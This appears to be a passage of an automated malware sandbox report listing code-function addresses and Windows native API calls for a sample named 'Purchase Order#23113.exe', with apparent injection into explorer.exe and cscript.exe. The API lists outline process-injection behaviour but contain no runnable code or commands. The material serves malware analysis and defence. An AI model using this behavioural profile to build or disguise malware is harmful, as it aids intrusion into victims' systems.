          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Code function: 2_2_0041A490 NtClose,2_2_0041A490
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Code function: 2_2_0041A540 NtAllocateVirtualMemory,2_2_0041A540
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Code function: 2_2_0041A35C NtCreateFile,2_2_0041A35C
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Code function: 2_2_0041A40B NtReadFile,2_2_0041A40B
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Code function: 2_2_0041A53A NtAllocateVirtualMemory,2_2_0041A53A
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Code function: 2_2_01772B60 NtClose,LdrInitializeThunk,2_2_01772B60
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Code function: 2_2_01772BF0 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_01772BF0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Code function: 2_2_01772AD0 NtReadFile,LdrInitializeThunk,2_2_01772AD0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Code function: 2_2_01772D30 NtUnmapViewOfSection,LdrInitializeThunk,2_2_01772D30
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Code function: 2_2_01772D10 NtMapViewOfSection,LdrInitializeThunk,2_2_01772D10
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Code function: 2_2_01772DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_01772DF0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Code function: 2_2_01772DD0 NtDelayExecution,LdrInitializeThunk,2_2_01772DD0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Code function: 2_2_01772C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_01772C70
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Code function: 2_2_01772CA0 NtQueryInformationToken,LdrInitializeThunk,2_2_01772CA0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Code function: 2_2_01772F30 NtCreateSection,LdrInitializeThunk,2_2_01772F30
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Code function: 2_2_01772FE0 NtCreateFile,LdrInitializeThunk,2_2_01772FE0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Code function: 2_2_01772FB0 NtResumeThread,LdrInitializeThunk,2_2_01772FB0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Code function: 2_2_01772F90 NtProtectVirtualMemory,LdrInitializeThunk,2_2_01772F90
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Code function: 2_2_01772EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_01772EA0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Code function: 2_2_01772E80 NtReadVirtualMemory,LdrInitializeThunk,2_2_01772E80
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Code function: 2_2_01774340 NtSetContextThread,2_2_01774340
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Code function: 2_2_01774650 NtSuspendThread,2_2_01774650
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Code function: 2_2_01772BE0 NtQueryValueKey,2_2_01772BE0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Code function: 2_2_01772BA0 NtEnumerateValueKey,2_2_01772BA0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Code function: 2_2_01772B80 NtQueryInformationFile,2_2_01772B80
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Code function: 2_2_01772AF0 NtWriteFile,2_2_01772AF0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Code function: 2_2_01772AB0 NtWaitForSingleObject,2_2_01772AB0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Code function: 2_2_01772D00 NtSetInformationFile,2_2_01772D00
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Code function: 2_2_01772DB0 NtEnumerateKey,2_2_01772DB0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Code function: 2_2_01772C60 NtCreateKey,2_2_01772C60
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Code function: 2_2_01772C00 NtQueryInformationProcess,2_2_01772C00
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Code function: 2_2_01772CF0 NtOpenProcess,2_2_01772CF0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Code function: 2_2_01772CC0 NtQueryVirtualMemory,2_2_01772CC0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Code function: 2_2_01772F60 NtCreateProcessEx,2_2_01772F60
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Code function: 2_2_01772FA0 NtQuerySection,2_2_01772FA0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Code function: 2_2_01772E30 NtWriteVirtualMemory,2_2_01772E30
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Code function: 2_2_01772EE0 NtQueueApcThread,2_2_01772EE0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Code function: 2_2_01773010 NtOpenDirectoryObject,2_2_01773010
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Code function: 2_2_01773090 NtSetValueKey,2_2_01773090
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Code function: 2_2_017735C0 NtCreateMutant,2_2_017735C0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Code function: 2_2_017739B0 NtGetContextThread,2_2_017739B0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Code function: 2_2_01773D70 NtOpenThread,2_2_01773D70
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Code function: 2_2_01773D10 NtOpenProcessToken,2_2_01773D10
          Source: C:\Windows\explorer.exe, Code function: 3_2_0E63E232 NtCreateFile,3_2_0E63E232
          Source: C:\Windows\explorer.exe, Code function: 3_2_0E63FE12 NtProtectVirtualMemory,3_2_0E63FE12
          Source: C:\Windows\explorer.exe, Code function: 3_2_0E63FE0A NtProtectVirtualMemory,3_2_0E63FE0A
          Source: C:\Windows\SysWOW64\cscript.exe, Code function: 4_2_04F42CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_04F42CA0
          Source: C:\Windows\SysWOW64\cscript.exe, Code function: 4_2_04F42C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_04F42C70
          Source: C:\Windows\SysWOW64\cscript.exe, Code function: 4_2_04F42C60 NtCreateKey,LdrInitializeThunk,4_2_04F42C60
          Source: C:\Windows\SysWOW64\cscript.exe, Code function: 4_2_04F42DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_04F42DF0
          Source: C:\Windows\SysWOW64\cscript.exe, Code function: 4_2_04F42DD0 NtDelayExecution,LdrInitializeThunk,4_2_04F42DD0
          Source: C:\Windows\SysWOW64\cscript.exe, Code function: 4_2_04F42D10 NtMapViewOfSection,LdrInitializeThunk,4_2_04F42D10
          Source: C:\Windows\SysWOW64\cscript.exe, Code function: 4_2_04F42EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_04F42EA0
          Source: C:\Windows\SysWOW64\cscript.exe, Code function: 4_2_04F42FE0 NtCreateFile,LdrInitializeThunk,4_2_04F42FE0
          Source: C:\Windows\SysWOW64\cscript.exe, Code function: 4_2_04F42F30 NtCreateSection,LdrInitializeThunk,4_2_04F42F30
          Source: C:\Windows\SysWOW64\cscript.exe, Code function: 4_2_04F42AD0 NtReadFile,LdrInitializeThunk,4_2_04F42AD0
          Source: C:\Windows\SysWOW64\cscript.exe, Code function: 4_2_04F42BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_04F42BF0
          Source: C:\Windows\SysWOW64\cscript.exe, Code function: 4_2_04F42BE0 NtQueryValueKey,LdrInitializeThunk,4_2_04F42BE0
          Source: C:\Windows\SysWOW64\cscript.exe, Code function: 4_2_04F42B60 NtClose,LdrInitializeThunk,4_2_04F42B60
          Source: C:\Windows\SysWOW64\cscript.exe, Code function: 4_2_04F435C0 NtCreateMutant,LdrInitializeThunk,4_2_04F435C0
          Source: C:\Windows\SysWOW64\cscript.exe, Code function: 4_2_04F44650 NtSuspendThread,4_2_04F44650
          Source: C:\Windows\SysWOW64\cscript.exe, Code function: 4_2_04F44340 NtSetContextThread,4_2_04F44340
          Source: C:\Windows\SysWOW64\cscript.exe, Code function: 4_2_04F42CF0 NtOpenProcess,4_2_04F42CF0
          Source: C:\Windows\SysWOW64\cscript.exe, Code function: 4_2_04F42CC0 NtQueryVirtualMemory,4_2_04F42CC0
          Source: C:\Windows\SysWOW64\cscript.exe, Code function: 4_2_04F42C00 NtQueryInformationProcess,4_2_04F42C00
          Source: C:\Windows\SysWOW64\cscript.exe, Code function: 4_2_04F42DB0 NtEnumerateKey,4_2_04F42DB0
          Source: C:\Windows\SysWOW64\cscript.exe, Code function: 4_2_04F42D30 NtUnmapViewOfSection,4_2_04F42D30
          Source: C:\Windows\SysWOW64\cscript.exe, Code function: 4_2_04F42D00 NtSetInformationFile,4_2_04F42D00
          Source: C:\Windows\SysWOW64\cscript.exe, Code function: 4_2_04F42EE0 NtQueueApcThread,4_2_04F42EE0
          Source: C:\Windows\SysWOW64\cscript.exe, Code function: 4_2_04F42E80 NtReadVirtualMemory,4_2_04F42E80
          Source: C:\Windows\SysWOW64\cscript.exe, Code function: 4_2_04F42E30 NtWriteVirtualMemory,4_2_04F42E30
          Source: C:\Windows\SysWOW64\cscript.exe, Code function: 4_2_04F42FB0 NtResumeThread,4_2_04F42FB0
          Source: C:\Windows\SysWOW64\cscript.exe, Code function: 4_2_04F42FA0 NtQuerySection,4_2_04F42FA0
          Source: C:\Windows\SysWOW64\cscript.exe, Code function: 4_2_04F42F90 NtProtectVirtualMemory,4_2_04F42F90
          Source: C:\Windows\SysWOW64\cscript.exe, Code function: 4_2_04F42F60 NtCreateProcessEx,4_2_04F42F60
          Source: C:\Windows\SysWOW64\cscript.exe, Code function: 4_2_04F42AF0 NtWriteFile,4_2_04F42AF0
          Source: C:\Windows\SysWOW64\cscript.exe, Code function: 4_2_04F42AB0 NtWaitForSingleObject,4_2_04F42AB0
          Source: C:\Windows\SysWOW64\cscript.exe, Code function: 4_2_04F42BA0 NtEnumerateValueKey,4_2_04F42BA0
          Source: C:\Windows\SysWOW64\cscript.exe, Code function: 4_2_04F42B80 NtQueryInformationFile,4_2_04F42B80
          Source: C:\Windows\SysWOW64\cscript.exe, Code function: 4_2_04F43090 NtSetValueKey,4_2_04F43090
          Source: C:\Windows\SysWOW64\cscript.exe, Code function: 4_2_04F43010 NtOpenDirectoryObject,4_2_04F43010
          Source: C:\Windows\SysWOW64\cscript.exe, Code function: 4_2_04F43D70 NtOpenThread,4_2_04F43D70
          Source: C:\Windows\SysWOW64\cscript.exe, Code function: 4_2_04F43D10 NtOpenProcessToken,4_2_04F43D10
          Source: C:\Windows\SysWOW64\cscript.exe, Code function: 4_2_04F439B0 NtGetContextThread,4_2_04F439B0
          Source: C:\Windows\SysWOW64\cscript.exe, Code function: 4_2_02DBA360 NtCreateFile,4_2_02DBA360
          Source: C:\Windows\SysWOW64\cscript.exe, Code function: 4_2_02DBA490 NtClose,4_2_02DBA490
          Source: C:\Windows\SysWOW64\cscript.exe, Code function: 4_2_02DBA410 NtReadFile,4_2_02DBA410
          Source: C:\Windows\SysWOW64\cscript.exe, Code function: 4_2_02DBA540 NtAllocateVirtualMemory,4_2_02DBA540
          Source: C:\Windows\SysWOW64\cscript.exe, Code function: 4_2_02DBA35C NtCreateFile,4_2_02DBA35C
          Source: C:\Windows\SysWOW64\cscript.exe, Code function: 4_2_02DBA40B NtReadFile,4_2_02DBA40B
          Source: C:\Windows\SysWOW64\cscript.exe, Code function: 4_2_02DBA53A NtAllocateVirtualMemory,4_2_02DBA53A
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0041DAE62_2_0041DAE6
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0041DB922_2_0041DB92
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0041DD872_2_0041DD87
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0041D5A32_2_0041D5A3
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0041E5B42_2_0041E5B4
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_00409E602_2_00409E60
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0041DEB92_2_0041DEB9
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017C81582_2_017C8158
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_018001AA2_2_018001AA
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017DA1182_2_017DA118
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017301002_2_01730100
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017F81CC2_2_017F81CC
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017F41A22_2_017F41A2
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017D20002_2_017D2000
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017FA3522_2_017FA352
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_018003E62_2_018003E6
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0174E3F02_2_0174E3F0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017E02742_2_017E0274
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017C02C02_2_017C02C0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_018005912_2_01800591
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017405352_2_01740535
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017F24462_2_017F2446
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017E44202_2_017E4420
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017EE4F62_2_017EE4F6
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017407702_2_01740770
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017647502_2_01764750
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0173C7C02_2_0173C7C0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175C6E02_2_0175C6E0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017569622_2_01756962
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0180A9A62_2_0180A9A6
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017429A02_2_017429A0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0174A8402_2_0174A840
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017428402_2_01742840
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176E8F02_2_0176E8F0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017268B82_2_017268B8
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017FAB402_2_017FAB40
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017F6BD72_2_017F6BD7
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0173EA802_2_0173EA80
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017DCD1F2_2_017DCD1F
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0174AD002_2_0174AD00
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0173ADE02_2_0173ADE0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01758DBF2_2_01758DBF
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01740C002_2_01740C00
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01730CF22_2_01730CF2
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017E0CB52_2_017E0CB5
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B4F402_2_017B4F40
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01760F302_2_01760F30
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017E2F302_2_017E2F30
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01782F282_2_01782F28
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01732FC82_2_01732FC8
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017BEFA02_2_017BEFA0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01740E592_2_01740E59
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017FEE262_2_017FEE26
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017FEEDB2_2_017FEEDB
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01752E902_2_01752E90
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017FCE932_2_017FCE93
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0172F1722_2_0172F172
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0177516C2_2_0177516C
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0174B1B02_2_0174B1B0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0180B16B2_2_0180B16B
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017F70E92_2_017F70E9
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017FF0E02_2_017FF0E0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017EF0CC2_2_017EF0CC
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017470C02_2_017470C0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0172D34C2_2_0172D34C
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017F132D2_2_017F132D
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0178739A2_2_0178739A
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175D2F02_2_0175D2F0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017E12ED2_2_017E12ED
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175B2C02_2_0175B2C0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017452A02_2_017452A0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017F75712_2_017F7571
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_018095C32_2_018095C3
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017DD5B02_2_017DD5B0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017314602_2_01731460
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017FF43F2_2_017FF43F
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017FF7B02_2_017FF7B0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017856302_2_01785630
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017F16CC2_2_017F16CC
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017499502_2_01749950
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175B9502_2_0175B950
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017D59102_2_017D5910
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017AD8002_2_017AD800
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017438E02_2_017438E0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017FFB762_2_017FFB76
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B5BF02_2_017B5BF0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0177DBF92_2_0177DBF9
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175FB802_2_0175FB80
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B3A6C2_2_017B3A6C
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017FFA492_2_017FFA49
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017F7A462_2_017F7A46
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017EDAC62_2_017EDAC6
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017DDAAC2_2_017DDAAC
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01785AA02_2_01785AA0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017E1AA32_2_017E1AA3
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017F7D732_2_017F7D73
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017F1D5A2_2_017F1D5A
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01743D402_2_01743D40
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175FDC02_2_0175FDC0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B9C322_2_017B9C32
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017FFCF22_2_017FFCF2
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017FFF092_2_017FFF09
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01703FD22_2_01703FD2
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01703FD52_2_01703FD5
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017FFFB12_2_017FFFB1
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01741F922_2_01741F92
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01749EB02_2_01749EB0
          Source: C:\Windows\explorer.exeCode function: 3_2_0E63E2323_2_0E63E232
          Source: C:\Windows\explorer.exeCode function: 3_2_0E63D0363_2_0E63D036
          Source: C:\Windows\explorer.exeCode function: 3_2_0E6340823_2_0E634082
          Source: C:\Windows\explorer.exeCode function: 3_2_0E638B323_2_0E638B32
          Source: C:\Windows\explorer.exeCode function: 3_2_0E638B303_2_0E638B30
          Source: C:\Windows\explorer.exeCode function: 3_2_0E635D023_2_0E635D02
          Source: C:\Windows\explorer.exeCode function: 3_2_0E63B9123_2_0E63B912
          Source: C:\Windows\explorer.exeCode function: 3_2_0E6415CD3_2_0E6415CD
          Source: C:\Windows\explorer.exeCode function: 3_2_0F27AB323_2_0F27AB32
          Source: C:\Windows\explorer.exeCode function: 3_2_0F27AB303_2_0F27AB30
          Source: C:\Windows\explorer.exeCode function: 3_2_0F2802323_2_0F280232
          Source: C:\Windows\explorer.exeCode function: 3_2_0F277D023_2_0F277D02
          Source: C:\Windows\explorer.exeCode function: 3_2_0F27D9123_2_0F27D912
          Source: C:\Windows\explorer.exeCode function: 3_2_0F2835CD3_2_0F2835CD
          Source: C:\Windows\explorer.exeCode function: 3_2_0F27F0363_2_0F27F036
          Source: C:\Windows\explorer.exeCode function: 3_2_0F2760823_2_0F276082
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_007071104_2_00707110
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FBE4F64_2_04FBE4F6
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FC24464_2_04FC2446
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FD05914_2_04FD0591
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F105354_2_04F10535
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F2C6E04_2_04F2C6E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F0C7C04_2_04F0C7C0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F107704_2_04F10770
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F347504_2_04F34750
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FA20004_2_04FA2000
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FC81CC4_2_04FC81CC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FD01AA4_2_04FD01AA
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F981584_2_04F98158
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FAA1184_2_04FAA118
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F001004_2_04F00100
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F902C04_2_04F902C0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FB02744_2_04FB0274
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F1E3F04_2_04F1E3F0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FD03E64_2_04FD03E6
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FCA3524_2_04FCA352
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F00CF24_2_04F00CF2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FB0CB54_2_04FB0CB5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F10C004_2_04F10C00
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F0ADE04_2_04F0ADE0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F28DBF4_2_04F28DBF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F1AD004_2_04F1AD00
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FCEEDB4_2_04FCEEDB
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F22E904_2_04F22E90
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FCCE934_2_04FCCE93
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F10E594_2_04F10E59
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FCEE264_2_04FCEE26
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F02FC84_2_04F02FC8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F8EFA04_2_04F8EFA0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F84F404_2_04F84F40
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F30F304_2_04F30F30
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F52F284_2_04F52F28
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F3E8F04_2_04F3E8F0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04EF68B84_2_04EF68B8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F1A8404_2_04F1A840
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F128404_2_04F12840
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F129A04_2_04F129A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FDA9A64_2_04FDA9A6
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F269624_2_04F26962
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F0EA804_2_04F0EA80
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FC6BD74_2_04FC6BD7
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FCAB404_2_04FCAB40
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F014604_2_04F01460
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FCF43F4_2_04FCF43F
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FAD5B04_2_04FAD5B0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FC75714_2_04FC7571
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FC16CC4_2_04FC16CC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FCF7B04_2_04FCF7B0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FC70E94_2_04FC70E9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FCF0E04_2_04FCF0E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F170C04_2_04F170C0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FBF0CC4_2_04FBF0CC
